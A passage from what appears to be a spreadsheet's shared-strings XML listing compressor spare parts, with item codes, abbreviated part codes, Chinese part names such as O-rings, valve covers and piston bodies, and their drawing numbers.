    <t>OXQ122*1.8</t>
  </si>
  <si>
    <t>122*1.8</t>
  </si>
  <si>
    <t>080204056</t>
  </si>
  <si>
    <t>SZTT04-01</t>
  </si>
  <si>
    <t>04-01</t>
  </si>
  <si>
    <t>080204065</t>
  </si>
  <si>
    <t>YFZ15-06</t>
  </si>
  <si>
    <t>压阀罩</t>
  </si>
  <si>
    <t>15-06</t>
  </si>
  <si>
    <t>080204066</t>
  </si>
  <si>
    <t>YFZ15-17</t>
  </si>
  <si>
    <t>15-17</t>
  </si>
  <si>
    <t>080204067</t>
  </si>
  <si>
    <t>YFZ</t>
  </si>
  <si>
    <t>080204070</t>
  </si>
  <si>
    <t>ZS08-02/03</t>
  </si>
  <si>
    <t>08-02/03</t>
  </si>
  <si>
    <t>080204072</t>
  </si>
  <si>
    <t>TLZJ15-00</t>
  </si>
  <si>
    <t>15-00</t>
  </si>
  <si>
    <t>080204080</t>
  </si>
  <si>
    <t>OXQ125*1.8</t>
  </si>
  <si>
    <t>125*1.8</t>
  </si>
  <si>
    <t>080204085</t>
  </si>
  <si>
    <t>AM27*80-Y</t>
  </si>
  <si>
    <t>080204087</t>
  </si>
  <si>
    <t>LDm76*4*147</t>
  </si>
  <si>
    <t>m76*4*147</t>
  </si>
  <si>
    <t>080204090</t>
  </si>
  <si>
    <t>JTSTS15-10M39*580</t>
  </si>
  <si>
    <t>阶梯双头栓</t>
  </si>
  <si>
    <t>15-10M39*580</t>
  </si>
  <si>
    <t>080204091</t>
  </si>
  <si>
    <t>4M16.36-03/04/08/09/10</t>
  </si>
  <si>
    <t>080204098</t>
  </si>
  <si>
    <t>FG13-05、15-19、15-15</t>
  </si>
  <si>
    <t>活门盖</t>
  </si>
  <si>
    <t>13-05、15-19、15-15</t>
  </si>
  <si>
    <t>080204100</t>
  </si>
  <si>
    <t>BHT89-09</t>
  </si>
  <si>
    <t>保护套</t>
  </si>
  <si>
    <t>89-09/02</t>
  </si>
  <si>
    <t>080204103</t>
  </si>
  <si>
    <t>GJD08-01</t>
  </si>
  <si>
    <t>工具垫</t>
  </si>
  <si>
    <t>08-01</t>
  </si>
  <si>
    <t>080204107</t>
  </si>
  <si>
    <t>GYH37-06</t>
  </si>
  <si>
    <t>37-06</t>
  </si>
  <si>
    <t>080204111</t>
  </si>
  <si>
    <t>GT4M16C15-05</t>
  </si>
  <si>
    <t>缸套</t>
  </si>
  <si>
    <t>4M16C15-05</t>
  </si>
  <si>
    <t>080204113</t>
  </si>
  <si>
    <t>YG37-08</t>
  </si>
  <si>
    <t>37-08</t>
  </si>
  <si>
    <t>080204114</t>
  </si>
  <si>
    <t>WLZCTM-16EDN</t>
  </si>
  <si>
    <t>涡轮总成</t>
  </si>
  <si>
    <t>TM-16EDN</t>
  </si>
  <si>
    <t>080204115</t>
  </si>
  <si>
    <t>WLZZCN</t>
  </si>
  <si>
    <t>涡轮轴</t>
  </si>
  <si>
    <t>ZCN-16</t>
  </si>
  <si>
    <t>080305002</t>
  </si>
  <si>
    <t>40JX.PQF4M40-41/51-00</t>
  </si>
  <si>
    <t>40机吸.排气阀</t>
  </si>
  <si>
    <t>4M40-41/51-00</t>
  </si>
  <si>
    <t>080305004</t>
  </si>
  <si>
    <t>40JX.PQF4M40-42/52-00</t>
  </si>
  <si>
    <t>4M40-42/52-00</t>
  </si>
  <si>
    <t>080305006</t>
  </si>
  <si>
    <t>40JX.PQF4M40-43/53-00</t>
  </si>
  <si>
    <t>4M40-43/53-00</t>
  </si>
  <si>
    <t>080305012</t>
  </si>
  <si>
    <t>HSH4M40-21-02</t>
  </si>
  <si>
    <t>4M40-21-02</t>
  </si>
  <si>
    <t>080305013</t>
  </si>
  <si>
    <t>HSH4M40-22-03</t>
  </si>
  <si>
    <t>4M40-22-03</t>
  </si>
  <si>
    <t>080305015</t>
  </si>
  <si>
    <t>HSH4M40-23-13</t>
  </si>
  <si>
    <t>4M40-23-13</t>
  </si>
  <si>
    <t>080305016</t>
  </si>
  <si>
    <t>HSH4M40-23-15</t>
  </si>
  <si>
    <t>4M40-23-15</t>
  </si>
  <si>
    <t>080305017</t>
  </si>
  <si>
    <t>HSH4M40-24-02</t>
  </si>
  <si>
    <t>4M40-24-02/03/04</t>
  </si>
  <si>
    <t>080305018</t>
  </si>
  <si>
    <t>TLH4M40-31-02</t>
  </si>
  <si>
    <t>4M40-31-02</t>
  </si>
  <si>
    <t>080305020</t>
  </si>
  <si>
    <t>TLH4M40-31-07</t>
  </si>
  <si>
    <t>4M40-31-07</t>
  </si>
  <si>
    <t>080305022</t>
  </si>
  <si>
    <t>TLH4M40-31-11</t>
  </si>
  <si>
    <t>4M40-31-11</t>
  </si>
  <si>
    <t>080305023</t>
  </si>
  <si>
    <t>tlhzc</t>
  </si>
  <si>
    <t>填料函总成</t>
  </si>
  <si>
    <t>4M40</t>
  </si>
  <si>
    <t>080305026</t>
  </si>
  <si>
    <t>QMD4M40-23-12</t>
  </si>
  <si>
    <t>4M40-23-12</t>
  </si>
  <si>
    <t>080305027</t>
  </si>
  <si>
    <t>HMTH4M40</t>
  </si>
  <si>
    <t>活门弹簧</t>
  </si>
  <si>
    <t>080305032</t>
  </si>
  <si>
    <t>OXQ31-07</t>
  </si>
  <si>
    <t>080305033</t>
  </si>
  <si>
    <t>OXQ31-08</t>
  </si>
  <si>
    <t>080305034</t>
  </si>
  <si>
    <t>OXQ31-09</t>
  </si>
  <si>
    <t>080305035</t>
  </si>
  <si>
    <t>CYJD041A-02</t>
  </si>
  <si>
    <t>承压胶垫</t>
  </si>
  <si>
    <t>041A-02</t>
  </si>
  <si>
    <t>080305037</t>
  </si>
  <si>
    <t>GYH051A-05</t>
  </si>
  <si>
    <t>051A-05</t>
  </si>
  <si>
    <t>080305038</t>
  </si>
  <si>
    <t>YG31-01</t>
  </si>
  <si>
    <t>080305039</t>
  </si>
  <si>
    <t>DFL31-04</t>
  </si>
  <si>
    <t>大法兰</t>
  </si>
  <si>
    <t>31-04</t>
  </si>
  <si>
    <t>080305040</t>
  </si>
  <si>
    <t>DK</t>
  </si>
  <si>
    <t>挡块</t>
  </si>
  <si>
    <t>4M50 21-03</t>
  </si>
  <si>
    <t>080305042</t>
  </si>
  <si>
    <t>DH051A-01</t>
  </si>
  <si>
    <t>挡环</t>
  </si>
  <si>
    <t>051A-01</t>
  </si>
  <si>
    <t>080305043</t>
  </si>
  <si>
    <t>GLH31-18</t>
  </si>
  <si>
    <t>隔离环</t>
  </si>
  <si>
    <t>31-18</t>
  </si>
  <si>
    <t>080305044</t>
  </si>
  <si>
    <t>JLH31-14</t>
  </si>
  <si>
    <t>31-14</t>
  </si>
  <si>
    <t>080305045</t>
  </si>
  <si>
    <t>ZLH31-17</t>
  </si>
  <si>
    <t>31-17</t>
  </si>
  <si>
    <t>080305047</t>
  </si>
  <si>
    <t>LM23-10</t>
  </si>
  <si>
    <t>23-10</t>
  </si>
  <si>
    <t>080305048</t>
  </si>
  <si>
    <t>LM23-05</t>
  </si>
  <si>
    <t>080305057</t>
  </si>
  <si>
    <t>阀片（环片）</t>
  </si>
  <si>
    <t>铁</t>
  </si>
  <si>
    <t>080305072</t>
  </si>
  <si>
    <t>连杆瓦（铜套）</t>
  </si>
  <si>
    <t>4M50.03-02a</t>
  </si>
  <si>
    <t>080305073</t>
  </si>
  <si>
    <t>LGW4268-306-12</t>
  </si>
  <si>
    <t>4268-306-12</t>
  </si>
  <si>
    <t>080305076</t>
  </si>
  <si>
    <t>HSG4M40-23-02</t>
  </si>
  <si>
    <t>4M40-23-02</t>
  </si>
  <si>
    <t>080305079</t>
  </si>
  <si>
    <t>OXQ4M40-14-12</t>
  </si>
  <si>
    <t>4M40-14-12</t>
  </si>
  <si>
    <t>080305105</t>
  </si>
  <si>
    <t>SMDZCY</t>
  </si>
  <si>
    <t>石墨垫</t>
  </si>
  <si>
    <t>ZCY</t>
  </si>
  <si>
    <t>080305106</t>
  </si>
  <si>
    <t>JD(OXQ)</t>
  </si>
  <si>
    <t>胶垫(O型圈)</t>
  </si>
  <si>
    <t>080305107</t>
  </si>
  <si>
    <t>ZCY18-0.35-1</t>
  </si>
  <si>
    <t>080305108</t>
  </si>
  <si>
    <t>TLZZCN-16/12/8</t>
  </si>
  <si>
    <t>凸轮轴</t>
  </si>
  <si>
    <t>ZCN-16/12/8</t>
  </si>
  <si>
    <t>080305110</t>
  </si>
  <si>
    <t>QMGT11-10</t>
  </si>
  <si>
    <t>11-10</t>
  </si>
  <si>
    <t>080305111</t>
  </si>
  <si>
    <t>LJMM16*1.5</t>
  </si>
  <si>
    <t>M16*1.5</t>
  </si>
  <si>
    <t>080305114</t>
  </si>
  <si>
    <t>YBCLZCY400/0.63-2</t>
  </si>
  <si>
    <t>油泵齿轮</t>
  </si>
  <si>
    <t>080306006</t>
  </si>
  <si>
    <t>34-06</t>
  </si>
  <si>
    <t>080306008</t>
  </si>
  <si>
    <t>TD34-08</t>
  </si>
  <si>
    <t>铁垫</t>
  </si>
  <si>
    <t>34-08</t>
  </si>
  <si>
    <t>080306013</t>
  </si>
  <si>
    <t>OXQ4M40</t>
  </si>
  <si>
    <t>080306014</t>
  </si>
  <si>
    <t>080306015</t>
  </si>
  <si>
    <t>TLH4M40</t>
  </si>
  <si>
    <t>080306016</t>
  </si>
  <si>
    <t>GLH34-16</t>
  </si>
  <si>
    <t>34-16</t>
  </si>
  <si>
    <t>080306018</t>
  </si>
  <si>
    <t>JLH34-18</t>
  </si>
  <si>
    <t>34-18</t>
  </si>
  <si>
    <t>080306019</t>
  </si>
  <si>
    <t>BDP34-19</t>
  </si>
  <si>
    <t>薄垫片</t>
  </si>
  <si>
    <t>34-19</t>
  </si>
  <si>
    <t>080306023</t>
  </si>
  <si>
    <t>GYH054A-02</t>
  </si>
  <si>
    <t>054A-02</t>
  </si>
  <si>
    <t>080306027</t>
  </si>
  <si>
    <t>YFZ41-00</t>
  </si>
  <si>
    <t>41-00</t>
  </si>
  <si>
    <t>080306028</t>
  </si>
  <si>
    <t>YFZ13-25</t>
  </si>
  <si>
    <t>13-25</t>
  </si>
  <si>
    <t>080306029</t>
  </si>
  <si>
    <t>YFZ12-10</t>
  </si>
  <si>
    <t>12-10</t>
  </si>
  <si>
    <t>080306030</t>
  </si>
  <si>
    <t>YFZ14-13</t>
  </si>
  <si>
    <t>14-13</t>
  </si>
  <si>
    <t>080306031</t>
  </si>
  <si>
    <t>YFZ13-03</t>
  </si>
  <si>
    <t>13-03</t>
  </si>
  <si>
    <t>080306032</t>
  </si>
  <si>
    <t>YFZ12-07</t>
  </si>
  <si>
    <t>12-07</t>
  </si>
  <si>
    <t>080306033</t>
  </si>
  <si>
    <t>YFZ13-21</t>
  </si>
  <si>
    <t>13-21</t>
  </si>
  <si>
    <t>080306034</t>
  </si>
  <si>
    <t>YFZ11-08</t>
  </si>
  <si>
    <t>11-08</t>
  </si>
  <si>
    <t>080306036</t>
  </si>
  <si>
    <t>OXQ450*7</t>
  </si>
  <si>
    <t>450*7</t>
  </si>
  <si>
    <t>080306044</t>
  </si>
  <si>
    <t>BLZQ4M-50-06-13</t>
  </si>
  <si>
    <t>4M-50-06-13</t>
  </si>
  <si>
    <t>080306045</t>
  </si>
  <si>
    <t>BLZQ4M-50-06-14</t>
  </si>
  <si>
    <t>4M-50-06-14</t>
  </si>
  <si>
    <t>080306047</t>
  </si>
  <si>
    <t>XZ06-06</t>
  </si>
  <si>
    <t>小轴</t>
  </si>
  <si>
    <t>06-06</t>
  </si>
  <si>
    <t>080306052</t>
  </si>
  <si>
    <t>MFH4M40-31-18</t>
  </si>
  <si>
    <t>4M40-31-18</t>
  </si>
  <si>
    <t>080306054</t>
  </si>
  <si>
    <t>D*31-12</t>
  </si>
  <si>
    <t>垫*</t>
  </si>
  <si>
    <t>080306055</t>
  </si>
  <si>
    <t>TGLH13-23</t>
  </si>
  <si>
    <t>铁隔离环</t>
  </si>
  <si>
    <t>13-23</t>
  </si>
  <si>
    <t>080306057</t>
  </si>
  <si>
    <t>OXQ200*5.3</t>
  </si>
  <si>
    <t>200*5.3</t>
  </si>
  <si>
    <t>080306061</t>
  </si>
  <si>
    <t>CL06-02</t>
  </si>
  <si>
    <t>06-02</t>
  </si>
  <si>
    <t>080306062</t>
  </si>
  <si>
    <t>CL06-03</t>
  </si>
  <si>
    <t>06-03</t>
  </si>
  <si>
    <t>080306065</t>
  </si>
  <si>
    <t>M16/30/36</t>
  </si>
  <si>
    <t>080306066</t>
  </si>
  <si>
    <t>080306068</t>
  </si>
  <si>
    <t>XJT6*10*1040</t>
  </si>
  <si>
    <t>6*10*1040</t>
  </si>
  <si>
    <t>080306072</t>
  </si>
  <si>
    <t>DH054A-04</t>
  </si>
  <si>
    <t>054A-04</t>
  </si>
  <si>
    <t>080306076</t>
  </si>
  <si>
    <t>FL05A-07</t>
  </si>
  <si>
    <t>05A-07</t>
  </si>
  <si>
    <t>080306078</t>
  </si>
  <si>
    <t>BHT89-00</t>
  </si>
  <si>
    <t>89-00</t>
  </si>
  <si>
    <t>080306085</t>
  </si>
  <si>
    <t>STLSJB2774</t>
  </si>
  <si>
    <t>JB2774</t>
  </si>
  <si>
    <t>080306091</t>
  </si>
  <si>
    <t>XMM16活门用</t>
  </si>
  <si>
    <t>小母</t>
  </si>
  <si>
    <t>M16活门用</t>
  </si>
  <si>
    <t>080306095</t>
  </si>
  <si>
    <t>DGM16活门用</t>
  </si>
  <si>
    <t>顶杆</t>
  </si>
  <si>
    <t>168.11-07</t>
  </si>
  <si>
    <t>080306096</t>
  </si>
  <si>
    <t>FWQF</t>
  </si>
  <si>
    <t>防污气阀</t>
  </si>
  <si>
    <t>080306098</t>
  </si>
  <si>
    <t>ZTQ</t>
  </si>
  <si>
    <t>止退圈</t>
  </si>
  <si>
    <t>080306099</t>
  </si>
  <si>
    <t>M16/40/92</t>
  </si>
  <si>
    <t>080306100</t>
  </si>
  <si>
    <t>TJ06-12</t>
  </si>
  <si>
    <t>06-12</t>
  </si>
  <si>
    <t>080306103</t>
  </si>
  <si>
    <t>DQGB858*76</t>
  </si>
  <si>
    <t>GB858*76</t>
  </si>
  <si>
    <t>080306104</t>
  </si>
  <si>
    <t>ZGB06-05</t>
  </si>
  <si>
    <t>GB06-05</t>
  </si>
  <si>
    <t>080306105</t>
  </si>
  <si>
    <t>DQGB8941</t>
  </si>
  <si>
    <t>GB8941-20</t>
  </si>
  <si>
    <t>080306106</t>
  </si>
  <si>
    <t>YG06-06</t>
  </si>
  <si>
    <t>080306108</t>
  </si>
  <si>
    <t>BPHS23-06a</t>
  </si>
  <si>
    <t>半偏活塞</t>
  </si>
  <si>
    <t>23-06a</t>
  </si>
  <si>
    <t>080306112</t>
  </si>
  <si>
    <t>LMM30</t>
  </si>
  <si>
    <t>M30/27</t>
  </si>
  <si>
    <t>080306113</t>
  </si>
  <si>
    <t>TD14-08</t>
  </si>
  <si>
    <t>14-08</t>
  </si>
  <si>
    <t>080306114</t>
  </si>
  <si>
    <t>LS27·30·36·39</t>
  </si>
  <si>
    <t>27·30·36·39</t>
  </si>
  <si>
    <t>080306115</t>
  </si>
  <si>
    <t>FG4M40-1/2/3/4/5/6</t>
  </si>
  <si>
    <t>4M40-1/2/3/4/5/6</t>
  </si>
  <si>
    <t>080306119</t>
  </si>
  <si>
    <t>XLS43-56</t>
  </si>
  <si>
    <t>小螺栓</t>
  </si>
  <si>
    <t>43-56</t>
  </si>
  <si>
    <t>080306124</t>
  </si>
  <si>
    <t>ZSH22(A)08-03</t>
  </si>
  <si>
    <t>H22(A)08-03</t>
  </si>
  <si>
    <t>080306125</t>
  </si>
  <si>
    <t>GYH4M50(63)37-04/05</t>
  </si>
  <si>
    <t>4M50(63)37-04/05</t>
  </si>
  <si>
    <t>080306126</t>
  </si>
  <si>
    <t>TSM6MD50.08-03</t>
  </si>
  <si>
    <t>特殊母</t>
  </si>
  <si>
    <t>6MD50.08-03</t>
  </si>
  <si>
    <t>080306127</t>
  </si>
  <si>
    <t>TZD6MD50.08-04</t>
  </si>
  <si>
    <t>6MD50.08-04</t>
  </si>
  <si>
    <t>080407001</t>
  </si>
  <si>
    <t>92JJ·PQF4M12-41/51-00</t>
  </si>
  <si>
    <t>92机进·排气阀</t>
  </si>
  <si>
    <t>4M12-41/51-00</t>
  </si>
  <si>
    <t>080407023</t>
  </si>
  <si>
    <t>FPH12</t>
  </si>
  <si>
    <t>H12</t>
  </si>
  <si>
    <t>080407025</t>
  </si>
  <si>
    <t>HSHΦ800A</t>
  </si>
  <si>
    <t>Φ800A</t>
  </si>
  <si>
    <t>080407026</t>
  </si>
  <si>
    <t>HSHΦ480A</t>
  </si>
  <si>
    <t>Φ480A</t>
  </si>
  <si>
    <t>080407028</t>
  </si>
  <si>
    <t>HSHΦ225A</t>
  </si>
  <si>
    <t>Φ225A</t>
  </si>
  <si>
    <t>080407029</t>
  </si>
  <si>
    <t>HSHΦ140A</t>
  </si>
  <si>
    <t>Φ140A</t>
  </si>
  <si>
    <t>080407030</t>
  </si>
  <si>
    <t>HSHΦ120A</t>
  </si>
  <si>
    <t>Φ120A</t>
  </si>
  <si>
    <t>080407031</t>
  </si>
  <si>
    <t>YDHSTH12-21-01</t>
  </si>
  <si>
    <t>一段活塞体</t>
  </si>
  <si>
    <t>H12-21-01</t>
  </si>
  <si>
    <t>080407033</t>
  </si>
  <si>
    <t>SDHSTH12-23-01</t>
  </si>
  <si>
    <t>三段活塞体</t>
  </si>
  <si>
    <t>H12-23-01</t>
  </si>
  <si>
    <t>080407035</t>
  </si>
  <si>
    <t>WDHSTH12-25-01</t>
  </si>
  <si>
    <t>H12-25-01</t>
  </si>
  <si>
    <t>080407036</t>
  </si>
  <si>
    <t>LDHSTH12IV-24-01</t>
  </si>
  <si>
    <t>六段活塞体</t>
  </si>
  <si>
    <t>H12IV-24-01</t>
  </si>
  <si>
    <t>080407037</t>
  </si>
  <si>
    <t>YDHSGMH12-21-02</t>
  </si>
  <si>
    <t>MH12-21-02</t>
  </si>
  <si>
    <t>080407039</t>
  </si>
  <si>
    <t>SDHSGMH12-23-02</t>
  </si>
  <si>
    <t>MH12-23-02</t>
  </si>
  <si>
    <t>080407040</t>
  </si>
  <si>
    <t>SDHSGMH12-24-02</t>
  </si>
  <si>
    <t>MH12-24-02</t>
  </si>
  <si>
    <t>080407043</t>
  </si>
  <si>
    <t>HJZ</t>
  </si>
  <si>
    <t>080407044</t>
  </si>
  <si>
    <t>活塞杆螺母</t>
  </si>
  <si>
    <t>MH12-25-01</t>
  </si>
  <si>
    <t>080407045</t>
  </si>
  <si>
    <t>MH12-26-01</t>
  </si>
  <si>
    <t>080407046</t>
  </si>
  <si>
    <t>SZTXH12-04-02</t>
  </si>
  <si>
    <t>十字头肖</t>
  </si>
  <si>
    <t>H12-04-02</t>
  </si>
  <si>
    <t>080407047</t>
  </si>
  <si>
    <t>MH12-23-01</t>
  </si>
  <si>
    <t>080407049</t>
  </si>
  <si>
    <t>LGLST12S-0301</t>
  </si>
  <si>
    <t>T12S-0301</t>
  </si>
  <si>
    <t>080407050</t>
  </si>
  <si>
    <t>LGLMT12轴、-0301</t>
  </si>
  <si>
    <t>T12轴、-0301</t>
  </si>
  <si>
    <t>080407051</t>
  </si>
  <si>
    <t>ZHFTT21-00</t>
  </si>
  <si>
    <t>止回伐头</t>
  </si>
  <si>
    <t>T21-00</t>
  </si>
  <si>
    <t>080407053</t>
  </si>
  <si>
    <t>CLT12H-02A-02/07-13</t>
  </si>
  <si>
    <t>T12H-02A-02/07-13</t>
  </si>
  <si>
    <t>080407054</t>
  </si>
  <si>
    <t>FSKH12-04-07</t>
  </si>
  <si>
    <t>防松块</t>
  </si>
  <si>
    <t>H12-04-07</t>
  </si>
  <si>
    <t>080407056</t>
  </si>
  <si>
    <t>JJLDMH12-04-02</t>
  </si>
  <si>
    <t>加紧螺钉</t>
  </si>
  <si>
    <t>MH12-04-02</t>
  </si>
  <si>
    <t>080407058</t>
  </si>
  <si>
    <t>FSQ25-02</t>
  </si>
  <si>
    <t>防松圈</t>
  </si>
  <si>
    <t>25-02</t>
  </si>
  <si>
    <t>080407061</t>
  </si>
  <si>
    <t>FSDQ26-02</t>
  </si>
  <si>
    <t>防松垫圈</t>
  </si>
  <si>
    <t>26-02</t>
  </si>
  <si>
    <t>080407062</t>
  </si>
  <si>
    <t>SZTMH12-04-06</t>
  </si>
  <si>
    <t>十字头母</t>
  </si>
  <si>
    <t>H12-04-06</t>
  </si>
  <si>
    <t>080407068</t>
  </si>
  <si>
    <t>DS24*95*2</t>
  </si>
  <si>
    <t>24*95*2</t>
  </si>
  <si>
    <t>080407071</t>
  </si>
  <si>
    <t>LDIV-11-15</t>
  </si>
  <si>
    <t>IV-11-15</t>
  </si>
  <si>
    <t>080407077</t>
  </si>
  <si>
    <t>GJTSYT4-00</t>
  </si>
  <si>
    <t>管接头</t>
  </si>
  <si>
    <t>SYT4-00</t>
  </si>
  <si>
    <t>080407078</t>
  </si>
  <si>
    <t>O XQ31-05</t>
  </si>
  <si>
    <t>O 型圈</t>
  </si>
  <si>
    <t>31-05填料用</t>
  </si>
  <si>
    <t>080407086</t>
  </si>
  <si>
    <t>FG11-06/11-07/13-05</t>
  </si>
  <si>
    <t>11-06/11-07/13-05</t>
  </si>
  <si>
    <t>080407095</t>
  </si>
  <si>
    <t>OXQ115*3.1</t>
  </si>
  <si>
    <t>115*3.1</t>
  </si>
  <si>
    <t>080407098</t>
  </si>
  <si>
    <t>DXHMH12-12-03</t>
  </si>
  <si>
    <t>导向环</t>
  </si>
  <si>
    <t>MH12-12-03</t>
  </si>
  <si>
    <t>080407099</t>
  </si>
  <si>
    <t>支承套</t>
  </si>
  <si>
    <t>080408001</t>
  </si>
  <si>
    <t>MFQT12-31-05</t>
  </si>
  <si>
    <t>T12-31-05</t>
  </si>
  <si>
    <t>080408002</t>
  </si>
  <si>
    <t>ZLHT12</t>
  </si>
  <si>
    <t>T12</t>
  </si>
  <si>
    <t>080408004</t>
  </si>
  <si>
    <t>JLHH12-33A-04</t>
  </si>
  <si>
    <t>H12-33A-04</t>
  </si>
  <si>
    <t>080408008</t>
  </si>
  <si>
    <t>YFZH12IV-12-08</t>
  </si>
  <si>
    <t>H12IV-12-08</t>
  </si>
  <si>
    <t>080408009</t>
  </si>
  <si>
    <t>YFZ15-10/13/18/17</t>
  </si>
  <si>
    <t>15-10/13/18/17</t>
  </si>
  <si>
    <t>080408014</t>
  </si>
  <si>
    <t>LGW*T12-03-04</t>
  </si>
  <si>
    <t>T12-03-04</t>
  </si>
  <si>
    <t>080408015</t>
  </si>
  <si>
    <t>ZWT12H-01-06/09</t>
  </si>
  <si>
    <t>T12H-01-06/09</t>
  </si>
  <si>
    <t>080408019</t>
  </si>
  <si>
    <t>GYHT22-01-22-00</t>
  </si>
  <si>
    <t>剖分油环</t>
  </si>
  <si>
    <t>T12-01-08</t>
  </si>
  <si>
    <t>080408022</t>
  </si>
  <si>
    <t>TZDMH12-05-04</t>
  </si>
  <si>
    <t>MH12-05-04</t>
  </si>
  <si>
    <t>080408032</t>
  </si>
  <si>
    <t>LM16机放</t>
  </si>
  <si>
    <t>16机放</t>
  </si>
  <si>
    <t>080408034</t>
  </si>
  <si>
    <t>LSM20*65</t>
  </si>
  <si>
    <t>M20*65</t>
  </si>
  <si>
    <t>080408035</t>
  </si>
  <si>
    <t>DXTT12-33A-07</t>
  </si>
  <si>
    <t>T12-33A-07</t>
  </si>
  <si>
    <t>080408036</t>
  </si>
  <si>
    <t>GTM12-16C-01B</t>
  </si>
  <si>
    <t>M12-16C-01B</t>
  </si>
  <si>
    <t>080408039</t>
  </si>
  <si>
    <t>GYH（XK）</t>
  </si>
  <si>
    <t>刮油环（斜口）</t>
  </si>
  <si>
    <t>080408042</t>
  </si>
  <si>
    <t>MH180</t>
  </si>
  <si>
    <t>080408043</t>
  </si>
  <si>
    <t>T12-04-05/06</t>
  </si>
  <si>
    <t>080408044</t>
  </si>
  <si>
    <t>080408047</t>
  </si>
  <si>
    <t>080408048</t>
  </si>
  <si>
    <t>HLCLT12-07-6</t>
  </si>
  <si>
    <t>滑轮齿轮</t>
  </si>
  <si>
    <t>T12-07-6</t>
  </si>
  <si>
    <t>080408049</t>
  </si>
  <si>
    <t>SGT12-07-28</t>
  </si>
  <si>
    <t>丝杆</t>
  </si>
  <si>
    <t>T12-07-28</t>
  </si>
  <si>
    <t>080408050</t>
  </si>
  <si>
    <t>NWLTMH22A-93-08-09A</t>
  </si>
  <si>
    <t>内外滤筒</t>
  </si>
  <si>
    <t>MH22A-93-08-09A</t>
  </si>
  <si>
    <t>080408051</t>
  </si>
  <si>
    <t>TLHT12-31-05/06/03</t>
  </si>
  <si>
    <t>T12-31-05/06/03</t>
  </si>
  <si>
    <t>080408053</t>
  </si>
  <si>
    <t>LGT12-33A-08</t>
  </si>
  <si>
    <t>拉杆</t>
  </si>
  <si>
    <t>T12-33A-08</t>
  </si>
  <si>
    <t>080408058</t>
  </si>
  <si>
    <t>GJMSY43-66</t>
  </si>
  <si>
    <t>管接母</t>
  </si>
  <si>
    <t>SY43-66</t>
  </si>
  <si>
    <t>080408059</t>
  </si>
  <si>
    <t>GTSY44-66</t>
  </si>
  <si>
    <t>管套</t>
  </si>
  <si>
    <t>SY44-66</t>
  </si>
  <si>
    <t>080408061</t>
  </si>
  <si>
    <t>GJTT12H-01-21</t>
  </si>
  <si>
    <t>T12H-01-21</t>
  </si>
  <si>
    <t>080408062</t>
  </si>
  <si>
    <t>ZYG</t>
  </si>
  <si>
    <t>080408063</t>
  </si>
  <si>
    <t>YGSYT52-2</t>
  </si>
  <si>
    <t>SYT52-2</t>
  </si>
  <si>
    <t>080408064</t>
  </si>
  <si>
    <t>GYQT12-05-02-00</t>
  </si>
  <si>
    <t>刮油器</t>
  </si>
  <si>
    <t>T12-05-02-00</t>
  </si>
  <si>
    <t>080408065</t>
  </si>
  <si>
    <t>PYQT12/T22</t>
  </si>
  <si>
    <t>抛油圈</t>
  </si>
  <si>
    <t>T12/T22</t>
  </si>
  <si>
    <t>080408066</t>
  </si>
  <si>
    <t>FWTH</t>
  </si>
  <si>
    <t>防污弹簧</t>
  </si>
  <si>
    <t>080408067</t>
  </si>
  <si>
    <t>YBLZQZCY-18/0.35/0.36-1</t>
  </si>
  <si>
    <t>油泵联轴器</t>
  </si>
  <si>
    <t>ZCY-18/0.35/0.36-1</t>
  </si>
  <si>
    <t>080408073</t>
  </si>
  <si>
    <t>LD85*75*2</t>
  </si>
  <si>
    <t>85*75*2</t>
  </si>
  <si>
    <t>080408075</t>
  </si>
  <si>
    <t>FLT12-33A-00</t>
  </si>
  <si>
    <t>T12-33A-00</t>
  </si>
  <si>
    <t>080408076</t>
  </si>
  <si>
    <t>LST12-07-03</t>
  </si>
  <si>
    <t>T12-07-03</t>
  </si>
  <si>
    <t>080408077</t>
  </si>
  <si>
    <t>ZH8-07-27B</t>
  </si>
  <si>
    <t>H8-07-27B</t>
  </si>
  <si>
    <t>080408078</t>
  </si>
  <si>
    <t>CTH8-07-29</t>
  </si>
  <si>
    <t>H8-07-29</t>
  </si>
  <si>
    <t>080408079</t>
  </si>
  <si>
    <t>CLZT12-07-07</t>
  </si>
  <si>
    <t>T12-07-07</t>
  </si>
  <si>
    <t>080408080</t>
  </si>
  <si>
    <t>TLZJT12-31A/33A-00</t>
  </si>
  <si>
    <t>080408081</t>
  </si>
  <si>
    <t>080408083</t>
  </si>
  <si>
    <t>DPGB854</t>
  </si>
  <si>
    <t>GB854</t>
  </si>
  <si>
    <t>080408085</t>
  </si>
  <si>
    <t>DLGMH12-15-02</t>
  </si>
  <si>
    <t>大拉杆</t>
  </si>
  <si>
    <t>MH12-15-02</t>
  </si>
  <si>
    <t>080408089</t>
  </si>
  <si>
    <t>CQMH12-05-05</t>
  </si>
  <si>
    <t>衬圈</t>
  </si>
  <si>
    <t>MH12-05-05</t>
  </si>
  <si>
    <t>080408090</t>
  </si>
  <si>
    <t>DKMH12-15-09</t>
  </si>
  <si>
    <t>垫块</t>
  </si>
  <si>
    <t>MH12-15-09</t>
  </si>
  <si>
    <t>080408091</t>
  </si>
  <si>
    <t>LQQFTGLL4-12</t>
  </si>
  <si>
    <t>冷却器封头</t>
  </si>
  <si>
    <t>GLL4-12</t>
  </si>
  <si>
    <t>080408093</t>
  </si>
  <si>
    <t>GDJTKJC-12</t>
  </si>
  <si>
    <t>过度接头</t>
  </si>
  <si>
    <t>KJC-12</t>
  </si>
  <si>
    <t>080408095</t>
  </si>
  <si>
    <t>DXHT12-02-08</t>
  </si>
  <si>
    <t>端向环</t>
  </si>
  <si>
    <t>T12-02-08</t>
  </si>
  <si>
    <t>080509001</t>
  </si>
  <si>
    <t>180JJPQF6M25-41/51-00</t>
  </si>
  <si>
    <t>180机进排气阀</t>
  </si>
  <si>
    <t>6M25-41/51-00</t>
  </si>
  <si>
    <t>080509005</t>
  </si>
  <si>
    <t>6M25-44/54-00</t>
  </si>
  <si>
    <t>080509007</t>
  </si>
  <si>
    <t>180JJPQF6M25-46/56-00</t>
  </si>
  <si>
    <t>6M25-46/56-00</t>
  </si>
  <si>
    <t>080509017</t>
  </si>
  <si>
    <t>DP42-04</t>
  </si>
  <si>
    <t>42-04</t>
  </si>
  <si>
    <t>080509022</t>
  </si>
  <si>
    <t>FP6M25</t>
  </si>
  <si>
    <t>6M25</t>
  </si>
  <si>
    <t>080509025</t>
  </si>
  <si>
    <t>ZLHS1/190-94R1-90</t>
  </si>
  <si>
    <t>S1/190-94R1-90（120*90*8）</t>
  </si>
  <si>
    <t>080509026</t>
  </si>
  <si>
    <t>OXQT25-31-05</t>
  </si>
  <si>
